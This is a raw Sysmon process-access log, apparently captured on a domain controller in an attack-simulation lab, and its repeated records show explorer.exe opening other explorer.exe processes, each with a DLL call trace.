16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.653{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.637{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 